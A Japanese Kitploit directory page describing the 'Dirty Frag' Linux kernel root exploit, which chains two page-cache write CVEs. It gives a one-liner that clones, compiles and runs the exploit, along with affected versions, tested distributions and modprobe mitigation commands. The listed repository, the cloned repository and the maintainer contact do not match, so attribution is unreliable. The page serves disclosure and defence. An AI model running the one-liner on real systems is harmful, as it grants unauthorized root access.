Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-43284 — Linuxカーネルの権限昇格エクスプロイト:2つのページキャッシュ書き込み脆弱性(CVE-2026-43284、CVE-2026-43500)を連鎖させ、主要なディストリビューション上で確実なrootアクセスを実現する。 | Kitploit
ツール/GitHubGitHub/frosterdl/cve-2026-43284
特権昇格脆弱性分析エクスプロイト学習と教育バイナリエクスプロイト
GitHubfrosterdl/cve-2026-43284

CVE-2026-43284

Linuxカーネルの権限昇格エクスプロイト:2つのページキャッシュ書き込み脆弱性(CVE-2026-43284、CVE-2026-43500)を連鎖させ、主要なディストリビューション上で確実なrootアクセスを実現する。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dirty Frag: 汎用Linux LPE

概要

本書では、Hyunwoo Kim (@v4bel) によって発見・報告された Dirty Frag 脆弱性クラスについて説明します。xfrm-ESP Page-Cache Write (CVE-2026-43284) と RxRPC Page-Cache Write (CVE-2026-43500) を連鎖させることで、攻撃者は主要な Linux ディストリビューション上で root に昇格できます。

Dirty Frag は Dirty Pipe や Copy Fail と同じバグファミリーに属します。これはタイミングウィンドウや競合に依存しない決定的な論理バグであり、失敗してもカーネルパニックを引き起こさず、悪用成功率が非常に高いです。

完全な技術詳細および開示タイムラインについては、付属の解説文書(このリポジトリには含まれていません)を参照してください。

  • xfrm-ESP Page-Cache Write (CVE-2026-43284) はメインラインのコミット f4c50a4034e6 で修正されました。
  • RxRPC Page-Cache Write (CVE-2026-43500) はメインラインのコミット aa54b1d27fe0 で修正されました。

[!NOTE] 本書が最初に公開された時点(2026-05-07)では、外部でエンバーゴは既に破られていました。その時点では、公開パッチやCVEは利用できませんでした。[email protected] のメンテナとの協議の後、Dirty Frag の開示が公開されました。タイムラインについては技術解説を参照してください。

悪用

クイックワンライナー

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

このPoCは、linux-distros との調整の後、情報提供目的で共有されています。許可なくシステムに対して実行しないでください。

クリーンアップ

⚠️ 重要: このエクスプロイトを実行するとページキャッシュが汚染されます。クリーンな状態に戻すには、以下を実行するか、マシンを再起動してください。

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

影響を受けるバージョン

  • CVE-2026-43284: xfrm-ESP Page-Cache Write は cac2661c53f3 (2017-01-17) から f4c50a4034e6 (2026-05-05) まで存在します。
  • CVE-2026-43500: RxRPC Page-Cache Write は 2dc334f1a63a (2023-06-08) から aa54b1d27fe0 (2026-05-10) まで存在します。

事実上、これらの脆弱性は約9年間にわたって影響を及ぼします。

テスト済みのディストリビューションバージョンは以下の通りです。

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

緩和策

  1. 影響を受けるモジュールを削除し、ページキャッシュをクリアするには、以下を実行します。
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. ディストリビューションのバックポートやベンダーパッチが利用可能になり次第適用してください。

FAQ

なぜ2つの脆弱性を連鎖させるのか?

xfrm-ESP Page-Cache Write は Copy Fail と同様の強力な任意4バイト STORE プリミティブを提供し、多くのディストリビューションで利用可能ですが、それをトリガーするには名前空間を作成する権限が必要です。

Ubuntu では、AppArmor によって非特権ユーザー名前空間の作成が制限され、xfrm-ESP がトリガーできなくなる可能性があります。RxRPC Page-Cache Write は名前空間作成権限を必要としませんが、rxrpc.ko モジュールは多くのディストリビューションでデフォルトで存在しません。ただし、Ubuntu では rxrpc.ko は通常ロードされています。

両方を連鎖させることで互いの欠点を補い、すべての主要なディストリビューションで root を獲得できます。詳細は技術解説を参照してください。

また「ブランド化」された「Dirty」シリーズですか?

はい。Dirty Frag は "Dirty Pipe" に関連しており、その名前はバグクラスが struct sk_buff の frag メンバーを変更することに由来しています。

「Copy Fail」との関係は?

Copy Fail がこの研究のきっかけとなりました。Dirty Frag チェーンにおける xfrm-ESP Page-Cache Write は Copy Fail と同じシンクを共有しますが、algif_aead の緩和策が存在する場合でもトリガーされます。したがって、Copy Fail に対して強化されたシステムでも Dirty Frag に対して脆弱である可能性があります。

Linux を修正するには?

上記「緩和策」のセクションの手順に従ってください。

連絡先

メンテナ: https://linkedin.com/in/tahamuhammadshafiq

ツールをダウンロード